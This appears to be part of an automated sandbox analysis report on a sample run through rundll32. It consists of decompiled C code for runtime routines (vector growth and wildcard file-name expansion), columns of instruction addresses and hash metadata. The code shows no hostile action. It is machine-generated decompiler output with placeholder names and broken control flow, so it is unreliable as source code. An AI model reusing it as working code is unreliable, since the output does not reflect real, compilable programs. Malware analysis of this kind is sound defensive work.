                                                                                              										__eflags = 0x3fffffff - _t175 - _t182;
                                                                                              										if(__eflags < 0) {
                                                                                              											_push("vector<T> too long");
                                                                                              											E04276A30(__eflags);
                                                                                              										}
                                                                                              										_a8 = _t175 + _t182;
                                                                                              										_t195 = _t189 - _t158 >> 2;
                                                                                              										_t115 = _t195 >> 1;
                                                                                              										__eflags = 0x3fffffff - _t115 - _t195;
                                                                                              										_t160 =  >=  ? _t115 + _t195 : 0;
                                                                                              										_t117 = _a8;
                                                                                              										__eflags = _t160 - _t117;
                                                                                              										_t118 =  >=  ? _t160 : _t117;
                                                                                              										_a8 = _t118;
                                                                                              										_v36 = _t118;
                                                                                              										_push(_t118);
                                                                                              										_t196 = E042606C0(_t195);
                                                                                              										_v40 = _t196;
                                                                                              										_t122 = _a4 -  *_t146 >> 2;
                                                                                              										_v32 = _t122;
                                                                                              										_v12 = 0;
                                                                                              										_t161 = _t196 + _t122 * 4;
                                                                                              										_push(_a4);
                                                                                              										_push(_t161);
                                                                                              										E04260990(_t161, _t182, _a12);
                                                                                              										_v28 = 1;
                                                                                              										_t205 = _t200 + 8;
                                                                                              										_a12 = _t205;
                                                                                              										_push(_a4);
                                                                                              										_push(_t161);
                                                                                              										_t162 =  *_t146;
                                                                                              										E04260A00(_t162, _a4, _t196);
                                                                                              										_v28 = 2;
                                                                                              										_a12 = _t205 + 0xc;
                                                                                              										_push(_a4);
                                                                                              										_push(_t162);
                                                                                              										_t180 = _t146[1];
                                                                                              										E04260A00(_a4, _t146[1], _t196 + (_v32 + _t182) * 4);
                                                                                              										_v12 = 0xffffffff;
                                                                                              										_t164 =  *_t146;
                                                                                              										_t186 = _t182 + (_t146[1] - _t164 >> 2);
                                                                                              										__eflags = _t164;
                                                                                              										if(_t164 != 0) {
                                                                                              											__eflags = _t146[2] - _t164;
                                                                                              											E042603B0(_t146, _t180, _t186, _t196, _t164, _t146[2] - _t164 >> 2);
                                                                                              										}
                                                                                              										_t146[2] = _t196 + _a8 * 4;
                                                                                              										_t146[1] = _t196 + _t186 * 4;
                                                                                              										 *_t146 = _t196;
                                                                                              									}
                                                                                              								}
                                                                                              								_t86 = _v0;
                                                                                              								 *_t86 =  *_t146 + _v44 * 4;
                                                                                              								 *[fs:0x0] = _v20;
                                                                                              								return _t86;
                                                                                              							} else {
                                                                                              								_t142 = E04275B14(__esi, __eflags, _t148);
                                                                                              								_t3 = _t142 + 0x23; // 0x23
                                                                                              								_t167 = _t3 & 0xffffffe0;
                                                                                              								__eflags = _t167;
                                                                                              								 *((intOrPtr*)(_t167 - 4)) = _t142;
                                                                                              								return _t167;
                                                                                              							}
                                                                                              						}
                                                                                              					}
                                                                                              				} else {
                                                                                              					return 0;
                                                                                              				}
                                                                                              			}













































                                                                                              0x042606c0
                                                                                              0x042606c3
                                                                                              0x042606c8
                                                                                              0x042606d2
                                                                                              0x042606d7
                                                                                              0x04260711
                                                                                              0x00000000
                                                                                              0x042606d9
                                                                                              0x042606d9
                                                                                              0x042606dc
                                                                                              0x042606e1
                                                                                              0x0426070e
                                                                                              0x042606e3
                                                                                              0x042606e3
                                                                                              0x042606e3
                                                                                              0x042606e6
                                                                                              0x042606e8
                                                                                              0x04260716
                                                                                              0x04260716
                                                                                              0x0426071b
                                                                                              0x0426071c
                                                                                              0x0426071d
                                                                                              0x0426071e
                                                                                              0x0426071f
                                                                                              0x04260723
                                                                                              0x04260725
                                                                                              0x04260730
                                                                                              0x04260731
                                                                                              0x04260737
                                                                                              0x0426073e
                                                                                              0x04260742
                                                                                              0x04260748
                                                                                              0x0426074b
                                                                                              0x0426074d
                                                                                              0x04260757
                                                                                              0x0426075a
                                                                                              0x0426075d
                                                                                              0x0426075f
                                                                                              0x04260765
                                                                                              0x04260768
                                                                                              0x0426076b
                                                                                              0x04260775
                                                                                              0x04260777
                                                                                              0x0426088f
                                                                                              0x04260890
                                                                                              0x04260893
                                                                                              0x04260894
                                                                                              0x0426089b
                                                                                              0x0426089e
                                                                                              0x042608fe
                                                                                              0x04260908
                                                                                              0x04260915
                                                                                              0x04260918
                                                                                              0x04260927
                                                                                              0x042608a0
                                                                                              0x042608a0
                                                                                              0x042608ab
                                                                                              0x042608b3
                                                                                              0x042608c7
                                                                                              0x042608ca
                                                                                              0x042608d1
                                                                                              0x042608d9
                                                                                              0x042608e0
                                                                                              0x042608ef
                                                                                              0x042608f4
                                                                                              0x0426077d
                                                                                              0x0426077d
                                                                                              0x04260781
                                                                                              0x0426078b
                                                                                              0x0426078d
                                                                                              0x0426078f
                                                                                              0x04260794
                                                                                              0x04260794
                                                                                              0x0426079c
                                                                                              0x042607a1
                                                                                              0x042607a6
                                                                                              0x042607b3
                                                                                              0x042607b5
                                                                                              0x042607b8
                                                                                              0x042607bb
                                                                                              0x042607bd
                                                                                              0x042607c0
                                                                                              0x042607c3
                                                                                              0x042607c6
                                                                                              0x042607cc
                                                                                              0x042607ce
                                                                                              0x042607d6
                                                                                              0x042607d9
                                                                                              0x042607dc
                                                                                              0x042607e3
                                                                                              0x042607e6
                                                                                              0x042607e9
                                                                                              0x042607ef
                                                                                              0x042607f4
                                                                                              0x042607fb
                                                                                              0x042607fe
                                                                                              0x04260801
                                                                                              0x04260804
                                                                                              0x04260809
                                                                                              0x0426080b
                                                                                              0x04260810
                                                                                              0x04260822
                                                                                              0x04260825
                                                                                              0x04260828
                                                                                              0x0426082a
                                                                                              0x04260830
                                                                                              0x04260838
                                                                                              0x0426083f
                                                                                              0x04260849
                                                                                              0x0426084b
                                                                                              0x0426084d
                                                                                              0x04260852
                                                                                              0x04260859
                                                                                              0x04260859
                                                                                              0x04260864
                                                                                              0x0426086a
                                                                                              0x0426086d
                                                                                              0x0426086d
                                                                                              0x04260777
                                                                                              0x04260937
                                                                                              0x0426093a
                                                                                              0x0426093f
                                                                                              0x0426094d
                                                                                              0x042606ea
                                                                                              0x042606eb
                                                                                              0x042606f3
                                                                                              0x042606f6
                                                                                              0x042606f6
                                                                                              0x042606f9
                                                                                              0x042606ff
                                                                                              0x042606ff
                                                                                              0x042606e8
                                                                                              0x042606e1
                                                                                              0x042606ca
                                                                                              0x042606cf
                                                                                              0x042606cf

                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: vector<T> too long
                                                                                              • API String ID: 0-3788999226
                                                                                              • Opcode ID: 2f23213cf39b80e097d9fedbc9451228687ff0bde14681e1ba3b255081e15fc9
                                                                                              • Instruction ID: 712599dad270de654d49055d4aae8216b8fb6bfa9d7f073ad0522275cfc79b7f
                                                                                              • Opcode Fuzzy Hash: 2f23213cf39b80e097d9fedbc9451228687ff0bde14681e1ba3b255081e15fc9
                                                                                              • Instruction Fuzzy Hash: F35184B1B202099FDB18DF68C881A6E77E5EB48310F148669F916DB384E771FD50CB91
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 72%
                                                                                              			E04289999(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8, intOrPtr _a12) {
                                                                                              				intOrPtr _v0;
                                                                                              				char _v6;
                                                                                              				char _v8;
                                                                                              				signed int _v12;
                                                                                              				signed int _v16;
                                                                                              				signed int _v20;
                                                                                              				signed int _v24;
                                                                                              				signed int _v28;
                                                                                              				signed int _v36;
                                                                                              				intOrPtr* _v64;
                                                                                              				intOrPtr _v96;
                                                                                              				intOrPtr* _v100;
                                                                                              				CHAR* _v104;
                                                                                              				signed int _v116;
                                                                                              				char _v290;
                                                                                              				signed int _v291;
                                                                                              				struct _WIN32_FIND_DATAA _v336;
                                                                                              				union _FINDEX_INFO_LEVELS _v340;
                                                                                              				signed int _v344;
                                                                                              				signed int _v348;
                                                                                              				intOrPtr _v440;
                                                                                              				intOrPtr* _t80;
                                                                                              				signed int _t82;
                                                                                              				signed int _t87;
                                                                                              				signed int _t91;
                                                                                              				signed int _t93;
                                                                                              				signed int _t95;
                                                                                              				signed int _t96;
                                                                                              				signed int _t100;
                                                                                              				signed int _t103;
                                                                                              				signed int _t108;
                                                                                              				signed int _t111;
                                                                                              				intOrPtr _t113;
                                                                                              				signed char _t115;
                                                                                              				union _FINDEX_INFO_LEVELS _t123;
                                                                                              				signed int _t128;
                                                                                              				signed int _t131;
                                                                                              				void* _t137;
                                                                                              				void* _t139;
                                                                                              				signed int _t140;
                                                                                              				signed int _t143;
                                                                                              				signed int _t145;
                                                                                              				signed int _t147;
                                                                                              				signed int* _t148;
                                                                                              				signed int _t151;
                                                                                              				void* _t154;
                                                                                              				CHAR* _t155;
                                                                                              				char _t158;
                                                                                              				char _t160;
                                                                                              				intOrPtr* _t163;
                                                                                              				void* _t164;
                                                                                              				intOrPtr* _t165;
                                                                                              				signed int _t167;
                                                                                              				void* _t169;
                                                                                              				intOrPtr* _t170;
                                                                                              				signed int _t174;
                                                                                              				signed int _t178;
                                                                                              				signed int _t179;
                                                                                              				intOrPtr* _t184;
                                                                                              				void* _t193;
                                                                                              				intOrPtr _t194;
                                                                                              				signed int _t196;
                                                                                              				signed int _t197;
                                                                                              				signed int _t199;
                                                                                              				signed int _t200;
                                                                                              				signed int _t202;
                                                                                              				union _FINDEX_INFO_LEVELS _t203;
                                                                                              				signed int _t208;
                                                                                              				signed int _t210;
                                                                                              				signed int _t211;
                                                                                              				void* _t213;
                                                                                              				intOrPtr _t214;
                                                                                              				void* _t215;
                                                                                              				signed int _t219;
                                                                                              				void* _t221;
                                                                                              				signed int _t222;
                                                                                              				void* _t223;
                                                                                              				void* _t224;
                                                                                              				void* _t225;
                                                                                              				signed int _t226;
                                                                                              				void* _t227;
                                                                                              				void* _t228;
                                                                                              
                                                                                              				_t80 = _a8;
                                                                                              				_t224 = _t223 - 0x20;
                                                                                              				if(_t80 != 0) {
                                                                                              					_t208 = _a4;
                                                                                              					_t160 = 0;
                                                                                              					 *_t80 = 0;
                                                                                              					_t199 = 0;
                                                                                              					_t151 = 0;
                                                                                              					_v36 = 0;
                                                                                              					_v336.cAlternateFileName = 0;
                                                                                              					_v28 = 0;
                                                                                              					__eflags =  *_t208;
                                                                                              					if( *_t208 == 0) {
                                                                                              						L9:
                                                                                              						_v12 = _v12 & 0x00000000;
                                                                                              						_t82 = _t151 - _t199;
                                                                                              						_v8 = _t160;
                                                                                              						_t191 = (_t82 >> 2) + 1;
                                                                                              						__eflags = _t151 - _t199;
                                                                                              						_v16 = (_t82 >> 2) + 1;
                                                                                              						asm("sbb esi, esi");
                                                                                              						_t210 =  !_t208 & _t82 + 0x00000003 >> 0x00000002;
                                                                                              						__eflags = _t210;
                                                                                              						if(_t210 != 0) {
                                                                                              							_t197 = _t199;
                                                                                              							_t158 = _t160;
                                                                                              							do {
                                                                                              								_t184 =  *_t197;
                                                                                              								_t17 = _t184 + 1; // 0x1
                                                                                              								_v8 = _t17;
                                                                                              								do {
                                                                                              									_t143 =  *_t184;
                                                                                              									_t184 = _t184 + 1;
                                                                                              									__eflags = _t143;
                                                                                              								} while (_t143 != 0);
                                                                                              								_t158 = _t158 + 1 + _t184 - _v8;
                                                                                              								_t197 = _t197 + 4;
                                                                                              								_t145 = _v12 + 1;
                                                                                              								_v12 = _t145;
                                                                                              								__eflags = _t145 - _t210;
                                                                                              							} while (_t145 != _t210);
                                                                                              							_t191 = _v16;
                                                                                              							_v8 = _t158;
                                                                                              							_t151 = _v336.cAlternateFileName;
                                                                                              						}
                                                                                              						_t211 = E04280E6E(_t191, _v8, 1);
                                                                                              						_t225 = _t224 + 0xc;
                                                                                              						__eflags = _t211;
                                                                                              						if(_t211 != 0) {
                                                                                              							_t87 = _t211 + _v16 * 4;
                                                                                              							_v20 = _t87;
                                                                                              							_t192 = _t87;
                                                                                              							_v16 = _t87;
                                                                                              							__eflags = _t199 - _t151;
                                                                                              							if(_t199 == _t151) {
                                                                                              								L23:
                                                                                              								_t200 = 0;
                                                                                              								__eflags = 0;
                                                                                              								 *_a8 = _t211;
                                                                                              								goto L24;
                                                                                              							} else {
                                                                                              								_t93 = _t211 - _t199;
                                                                                              								__eflags = _t93;
                                                                                              								_v24 = _t93;
                                                                                              								do {
                                                                                              									_t163 =  *_t199;
                                                                                              									_v12 = _t163 + 1;
                                                                                              									do {
                                                                                              										_t95 =  *_t163;
                                                                                              										_t163 = _t163 + 1;
                                                                                              										__eflags = _t95;
                                                                                              									} while (_t95 != 0);
                                                                                              									_t164 = _t163 - _v12;
                                                                                              									_t35 = _t164 + 1; // 0x1
                                                                                              									_t96 = _t35;
                                                                                              									_push(_t96);
                                                                                              									_v12 = _t96;
                                                                                              									_t100 = E0428CC4B(_t164, _t192, _v20 - _t192 + _v8,  *_t199);
                                                                                              									_t225 = _t225 + 0x10;
                                                                                              									__eflags = _t100;
                                                                                              									if(_t100 != 0) {
                                                                                              										_push(0);
                                                                                              										_push(0);
                                                                                              										_push(0);
                                                                                              										_push(0);
                                                                                              										_push(0);
                                                                                              										E0427EF13();
                                                                                              										asm("int3");
                                                                                              										_t221 = _t225;
                                                                                              										_push(_t164);
                                                                                              										_t165 = _v64;
                                                                                              										_t47 = _t165 + 1; // 0x1
                                                                                              										_t193 = _t47;
                                                                                              										do {
                                                                                              											_t103 =  *_t165;
                                                                                              											_t165 = _t165 + 1;
                                                                                              											__eflags = _t103;
                                                                                              										} while (_t103 != 0);
                                                                                              										_push(_t199);
                                                                                              										_t202 = _a8;
                                                                                              										_t167 = _t165 - _t193 + 1;
                                                                                              										_v12 = _t167;
                                                                                              										__eflags = _t167 - (_t103 | 0xffffffff) - _t202;
                                                                                              										if(_t167 <= (_t103 | 0xffffffff) - _t202) {
                                                                                              											_push(_t151);
                                                                                              											_t50 = _t202 + 1; // 0x1
                                                                                              											_t154 = _t50 + _t167;
                                                                                              											_t213 = E04288535(_t167, _t154, 1);
                                                                                              											_t169 = _t211;
                                                                                              											__eflags = _t202;
                                                                                              											if(_t202 == 0) {
                                                                                              												L34:
                                                                                              												_push(_v12);
                                                                                              												_t154 = _t154 - _t202;
                                                                                              												_t108 = E0428CC4B(_t169, _t213 + _t202, _t154, _v0);
                                                                                              												_t226 = _t225 + 0x10;
                                                                                              												__eflags = _t108;
                                                                                              												if(__eflags != 0) {
                                                                                              													goto L37;
                                                                                              												} else {
                                                                                              													_t137 = E04289D68(_a12, __eflags, _t213);
                                                                                              													E042884AD(0);
                                                                                              													_t139 = _t137;
                                                                                              													goto L36;
                                                                                              												}
                                                                                              											} else {
                                                                                              												_push(_t202);
                                                                                              												_t140 = E0428CC4B(_t169, _t213, _t154, _a4);
                                                                                              												_t226 = _t225 + 0x10;
                                                                                              												__eflags = _t140;
                                                                                              												if(_t140 != 0) {
                                                                                              													L37:
                                                                                              													_push(0);
                                                                                              													_push(0);
                                                                                              													_push(0);
                                                                                              													_push(0);
                                                                                              													_push(0);
                                                                                              													E0427EF13();
                                                                                              													asm("int3");
                                                                                              													_push(_t221);
                                                                                              													_t222 = _t226;
                                                                                              													_t227 = _t226 - 0x150;
                                                                                              													_t111 =  *0x42a4008; // 0xd33db39d
                                                                                              													_v116 = _t111 ^ _t222;
                                                                                              													_t170 = _v100;
                                                                                              													_push(_t154);
                                                                                              													_t155 = _v104;
                                                                                              													_push(_t213);
                                                                                              													_t214 = _v96;
                                                                                              													_push(_t202);
                                                                                              													_v440 = _t214;
                                                                                              													while(1) {
                                                                                              														__eflags = _t170 - _t155;
                                                                                              														if(_t170 == _t155) {
                                                                                              															break;
                                                                                              														}
                                                                                              														_t113 =  *_t170;
                                                                                              														__eflags = _t113 - 0x2f;
                                                                                              														if(_t113 != 0x2f) {
                                                                                              															__eflags = _t113 - 0x5c;
                                                                                              															if(_t113 != 0x5c) {
                                                                                              																__eflags = _t113 - 0x3a;
                                                                                              																if(_t113 != 0x3a) {
                                                                                              																	_t170 = E0428CCA0(_t155, _t170);
                                                                                              																	continue;
                                                                                              																}
                                                                                              															}
                                                                                              														}
                                                                                              														break;
                                                                                              													}
                                                                                              													_t194 =  *_t170;
                                                                                              													__eflags = _t194 - 0x3a;
                                                                                              													if(_t194 != 0x3a) {
                                                                                              														L48:
                                                                                              														_t203 = 0;
                                                                                              														__eflags = _t194 - 0x2f;
                                                                                              														if(_t194 == 0x2f) {
                                                                                              															L52:
                                                                                              															_t115 = 1;
                                                                                              															__eflags = 1;
                                                                                              														} else {
                                                                                              															__eflags = _t194 - 0x5c;
                                                                                              															if(_t194 == 0x5c) {
                                                                                              																goto L52;
                                                                                              															} else {
                                                                                              																__eflags = _t194 - 0x3a;
                                                                                              																if(_t194 == 0x3a) {
                                                                                              																	goto L52;
                                                                                              																} else {
                                                                                              																	_t115 = 0;
                                                                                              																}
                                                                                              															}
                                                                                              														}
                                                                                              														asm("sbb eax, eax");
                                                                                              														_v344 =  ~(_t115 & 0x000000ff) & _t170 - _t155 + 0x00000001;
                                                                                              														E0427DEA0(_t203,  &_v336, _t203, 0x140);
                                                                                              														_t228 = _t227 + 0xc;
                                                                                              														_t215 = FindFirstFileExA(_t155, _t203,  &_v336, _t203, _t203, _t203);
                                                                                              														_t123 = _v340;
                                                                                              														__eflags = _t215 - 0xffffffff;
                                                                                              														if(_t215 != 0xffffffff) {
                                                                                              															_t174 =  *((intOrPtr*)(_t123 + 4)) -  *_t123;
                                                                                              															__eflags = _t174;
                                                                                              															_v348 = _t174 >> 2;
                                                                                              															do {
                                                                                              																__eflags = _v336.cFileName - 0x2e;
                                                                                              																if(_v336.cFileName != 0x2e) {
                                                                                              																	L65:
                                                                                              																	_push(_t123);
                                                                                              																	_push(_v344);
                                                                                              																	_t123 =  &(_v336.cFileName);
                                                                                              																	_push(_t155);
                                                                                              																	_push(_t123);
                                                                                              																	L28();
                                                                                              																	_t228 = _t228 + 0x10;
                                                                                              																	__eflags = _t123;
                                                                                              																	if(_t123 != 0) {
                                                                                              																		goto L55;
                                                                                              																	} else {
                                                                                              																		goto L66;
                                                                                              																	}
                                                                                              																} else {
                                                                                              																	_t178 = _v291;
                                                                                              																	__eflags = _t178;
                                                                                              																	if(_t178 == 0) {
                                                                                              																		goto L66;
                                                                                              																	} else {
                                                                                              																		__eflags = _t178 - 0x2e;
                                                                                              																		if(_t178 != 0x2e) {
                                                                                              																			goto L65;
                                                                                              																		} else {
                                                                                              																			__eflags = _v290;
                                                                                              																			if(_v290 == 0) {
                                                                                              																				goto L66;
                                                                                              																			} else {
                                                                                              																				goto L65;
                                                                                              																			}
                                                                                              																		}
                                                                                              																	}
                                                                                              																}
                                                                                              																goto L59;
                                                                                              																L66:
                                                                                              																_t128 = FindNextFileA(_t215,  &_v336);
                                                                                              																__eflags = _t128;
                                                                                              																_t123 = _v340;
                                                                                              															} while (_t128 != 0);
                                                                                              															_t195 =  *_t123;
                                                                                              															_t179 = _v348;
                                                                                              															_t131 =  *((intOrPtr*)(_t123 + 4)) -  *_t123 >> 2;
                                                                                              															__eflags = _t179 - _t131;
                                                                                              															if(_t179 != _t131) {
                                                                                              																E0428C800(_t155, _t203, _t215, _t195 + _t179 * 4, _t131 - _t179, 4, E04289981);
                                                                                              															}
                                                                                              														} else {
                                                                                              															_push(_t123);
                                                                                              															_push(_t203);
                                                                                              															_push(_t203);
                                                                                              															_push(_t155);
                                                                                              															L28();
                                                                                              															L55:
                                                                                              															_t203 = _t123;
                                                                                              														}
                                                                                              														__eflags = _t215 - 0xffffffff;
                                                                                              														if(_t215 != 0xffffffff) {
                                                                                              															FindClose(_t215);
                                                                                              														}
                                                                                              													} else {
                                                                                              														__eflags = _t170 -  &(_t155[1]);
                                                                                              														if(_t170 ==  &(_t155[1])) {
                                                                                              															goto L48;
                                                                                              														} else {
                                                                                              															_push(_t214);
                                                                                              															_push(0);
                                                                                              															_push(0);
                                                                                              															_push(_t155);
                                                                                              															L28();
                                                                                              														}
                                                                                              													}
                                                                                              													L59:
                                                                                              													__eflags = _v16 ^ _t222;
                                                                                              													return E04275AFE(_v16 ^ _t222);
                                                                                              												} else {
                                                                                              													goto L34;
                                                                                              												}
                                                                                              											}
                                                                                              										} else {
                                                                                              											_t139 = 0xc;
                                                                                              											L36:
                                                                                              											return _t139;
                                                                                              										}
                                                                                              									} else {
                                                                                              										goto L22;
                                                                                              									}
                                                                                              									goto L69;
                                                                                              									L22:
                                                                                              									_t196 = _v16;
                                                                                              									 *((intOrPtr*)(_v24 + _t199)) = _t196;
                                                                                              									_t199 = _t199 + 4;
                                                                                              									_t192 = _t196 + _v12;
                                                                                              									_v16 = _t196 + _v12;
                                                                                              									__eflags = _t199 - _t151;
                                                                                              								} while (_t199 != _t151);
                                                                                              								goto L23;
                                                                                              							}
                                                                                              						} else {
                                                                                              							_t200 = _t199 | 0xffffffff;
                                                                                              							L24:
                                                                                              							E042884AD(0);
                                                                                              							goto L25;
                                                                                              						}
                                                                                              					} else {
                                                                                              						while(1) {
                                                                                              							_v8 = 0x3f2a;
                                                                                              							_v6 = _t160;
                                                                                              							_t147 = E0428CC60( *_t208,  &_v8);
                                                                                              							__eflags = _t147;
                                                                                              							if(_t147 != 0) {
                                                                                              								_push( &_v36);
                                                                                              								_push(_t147);
                                                                                              								_push( *_t208);
                                                                                              								L38();
                                                                                              								_t224 = _t224 + 0xc;
                                                                                              							} else {
                                                                                              								_t147 =  &_v36;
                                                                                              								_push(_t147);
                                                                                              								_push(0);
                                                                                              								_push(0);
                                                                                              								_push( *_t208);
                                                                                              								L28();
                                                                                              								_t224 = _t224 + 0x10;
                                                                                              							}
                                                                                              							_t200 = _t147;
                                                                                              							__eflags = _t200;
                                                                                              							if(_t200 != 0) {
                                                                                              								break;
                                                                                              							}
                                                                                              							_t208 = _t208 + 4;
                                                                                              							_t160 = 0;
                                                                                              							__eflags =  *_t208;
                                                                                              							if( *_t208 != 0) {
                                                                                              								continue;
                                                                                              							} else {
                                                                                              								_t151 = _v336.cAlternateFileName;
                                                                                              								_t199 = _v36;
                                                                                              								goto L9;
                                                                                              							}
                                                                                              							goto L69;
                                                                                              						}
                                                                                              						L25:
                                                                                              						E04289D43( &_v36);
                                                                                              						_t91 = _t200;
                                                                                              						goto L26;
                                                                                              					}
                                                                                              				} else {
                                                                                              					_t148 = E04281772();
                                                                                              					_t219 = 0x16;
                                                                                              					 *_t148 = _t219;
                                                                                              					E0427EEE6();
                                                                                              					_t91 = _t219;
                                                                                              					L26:
                                                                                              					return _t91;
                                                                                              				}
                                                                                              				L69:
                                                                                              			}





















































































                                                                                              0x0428999e
                                                                                              0x042899a1
                                                                                              0x042899a7
                                                                                              0x042899bf
                                                                                              0x042899c2
                                                                                              0x042899c6
                                                                                              0x042899c8
                                                                                              0x042899ca
                                                                                              0x042899cc
                                                                                              0x042899cf
                                                                                              0x042899d2
                                                                                              0x042899d5
                                                                                              0x042899d7
                                                                                              0x04289a2f
                                                                                              0x04289a2f
                                                                                              0x04289a35
                                                                                              0x04289a37
                                                                                              0x04289a42
                                                                                              0x04289a46
                                                                                              0x04289a48
                                                                                              0x04289a4b
                                                                                              0x04289a4f
                                                                                              0x04289a4f
                                                                                              0x04289a51
                                                                                              0x04289a53
                                                                                              0x04289a55
                                                                                              0x04289a57
                                                                                              0x04289a57
                                                                                              0x04289a59
                                                                                              0x04289a5c
                                                                                              0x04289a5f
                                                                                              0x04289a5f
                                                                                              0x04289a61
                                                                                              0x04289a62
                                                                                              0x04289a62
                                                                                              0x04289a6d
                                                                                              0x04289a6f
                                                                                              0x04289a72
                                                                                              0x04289a73
                                                                                              0x04289a76
                                                                                              0x04289a76
                                                                                              0x04289a7a
                                                                                              0x04289a7d
                                                                                              0x04289a80
                                                                                              0x04289a80
                                                                                              0x04289a8e
                                                                                              0x04289a90
                                                                                              0x04289a93
                                                                                              0x04289a95
                                                                                              0x04289a9f
                                                                                              0x04289aa2
                                                                                              0x04289aa5
                                                                                              0x04289aa7
                                                                                              0x04289aaa
                                                                                              0x04289aac
                                                                                              0x04289afc
                                                                                              0x04289aff
                                                                                              0x04289aff
                                                                                              0x04289b01
                                                                                              0x00000000
                                                                                              0x04289aae
                                                                                              0x04289ab0
                                                                                              0x04289ab0
                                                                                              0x04289ab2
                                                                                              0x04289ab5
                                                                                              0x04289ab5
                                                                                              0x04289aba
                                                                                              0x04289abd
                                                                                              0x04289abd
                                                                                              0x04289abf
                                                                                              0x04289ac0
                                                                                              0x04289ac0
                                                                                              0x04289ac4
                                                                                              0x04289ac7
                                                                                              0x04289ac7
                                                                                              0x04289aca
                                                                                              0x04289acd
                                                                                              0x04289ada
                                                                                              0x04289adf
                                                                                              0x04289ae2
                                                                                              0x04289ae4
                                                                                              0x04289b1e
                                                                                              0x04289b1f
                                                                                              0x04289b20
                                                                                              0x04289b21
                                                                                              0x04289b22
                                                                                              0x04289b23
                                                                                              0x04289b28
                                                                                              0x04289b2c
                                                                                              0x04289b2e
                                                                                              0x04289b2f
                                                                                              0x04289b32
                                                                                              0x04289b32
                                                                                              0x04289b35
                                                                                              0x04289b35
                                                                                              0x04289b37
                                                                                              0x04289b38
                                                                                              0x04289b38
                                                                                              0x04289b41
                                                                                              0x04289b42
                                                                                              0x04289b45
                                                                                              0x04289b48
                                                                                              0x04289b4b
                                                                                              0x04289b4d
                                                                                              0x04289b54
                                                                                              0x04289b56
                                                                                              0x04289b59
                                                                                              0x04289b63
                                                                                              0x04289b66
                                                                                              0x04289b67
                                                                                              0x04289b69
                                                                                              0x04289b7d
                                                                                              0x04289b7d
                                                                                              0x04289b80
                                                                                              0x04289b8a
                                                                                              0x04289b8f
                                                                                              0x04289b92
                                                                                              0x04289b94
                                                                                              0x00000000
                                                                                              0x04289b96
                                                                                              0x04289b9a
                                                                                              0x04289ba3
                                                                                              0x04289ba9
                                                                                              0x00000000
                                                                                              0x04289bac
                                                                                              0x04289b6b
                                                                                              0x04289b6b
                                                                                              0x04289b71
                                                                                              0x04289b76
                                                                                              0x04289b79
                                                                                              0x04289b7b
                                                                                              0x04289bb2
                                                                                              0x04289bb4
                                                                                              0x04289bb5
                                                                                              0x04289bb6
                                                                                              0x04289bb7
                                                                                              0x04289bb8
                                                                                              0x04289bb9
                                                                                              0x04289bbe
                                                                                              0x04289bc1
                                                                                              0x04289bc2
                                                                                              0x04289bc4
                                                                                              0x04289bca
                                                                                              0x04289bd1
                                                                                              0x04289bd4
                                                                                              0x04289bd7
                                                                                              0x04289bd8
                                                                                              0x04289bdb
                                                                                              0x04289bdc
                                                                                              0x04289bdf
                                                                                              0x04289be0
                                                                                              0x04289c01
                                                                                              0x04289c01
                                                                                              0x04289c03
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x04289be8
                                                                                              0x04289bea
                                                                                              0x04289bec
                                                                                              0x04289bee
                                                                                              0x04289bf0
                                                                                              0x04289bf2
                                                                                              0x04289bf4
                                                                                              0x04289bff
                                                                                              0x00000000
                                                                                              0x04289bff
                                                                                              0x04289bf4
                                                                                              0x04289bf0
                                                                                              0x00000000
                                                                                              0x04289bec
                                                                                              0x04289c05
                                                                                              0x04289c07
                                                                                              0x04289c0a
                                                                                              0x04289c23
                                                                                              0x04289c23
                                                                                              0x04289c25
                                                                                              0x04289c28
                                                                                              0x04289c38
                                                                                              0x04289c3a
                                                                                              0x04289c3a
                                                                                              0x04289c2a
                                                                                              0x04289c2a
                                                                                              0x04289c2d
                                                                                              0x00000000
                                                                                              0x04289c2f
                                                                                              0x04289c2f
                                                                                              0x04289c32
                                                                                              0x00000000
                                                                                              0x04289c34
                                                                                              0x04289c34
                                                                                              0x04289c34
                                                                                              0x04289c32
                                                                                              0x04289c2d
                                                                                              0x04289c48
                                                                                              0x04289c4c
                                                                                              0x04289c5a
                                                                                              0x04289c5f
                                                                                              0x04289c74
                                                                                              0x04289c76
                                                                                              0x04289c7c
                                                                                              0x04289c7f
                                                                                              0x04289cb1
                                                                                              0x04289cb1
                                                                                              0x04289cb6
                                                                                              0x04289cbc
                                                                                              0x04289cbc
                                                                                              0x04289cc3
                                                                                              0x04289cdd
                                                                                              0x04289cdd
                                                                                              0x04289cde
                                                                                              0x04289ce4
                                                                                              0x04289cea
                                                                                              0x04289ceb
                                                                                              0x04289cec
                                                                                              0x04289cf1
                                                                                              0x04289cf4
                                                                                              0x04289cf6
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x04289cc5
                                                                                              0x04289cc5
                                                                                              0x04289ccb
                                                                                              0x04289ccd
                                                                                              0x00000000
                                                                                              0x04289ccf
                                                                                              0x04289ccf
                                                                                              0x04289cd2
                                                                                              0x00000000
                                                                                              0x04289cd4
                                                                                              0x04289cd4
                                                                                              0x04289cdb
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x04289cdb
                                                                                              0x04289cd2
                                                                                              0x04289ccd
                                                                                              0x00000000
                                                                                              0x04289cf8
                                                                                              0x04289d00
                                                                                              0x04289d06
                                                                                              0x04289d08
                                                                                              0x04289d08
                                                                                              0x04289d10
                                                                                              0x04289d15
                                                                                              0x04289d1d
                                                                                              0x04289d20
                                                                                              0x04289d22
                                                                                              0x04289d36
                                                                                              0x04289d3b
                                                                                              0x04289c81
                                                                                              0x04289c81
                                                                                              0x04289c82
                                                                                              0x04289c83
                                                                                              0x04289c84
                                                                                              0x04289c85
                                                                                              0x04289c8d
                                                                                              0x04289c8d
                                                                                              0x04289c8d
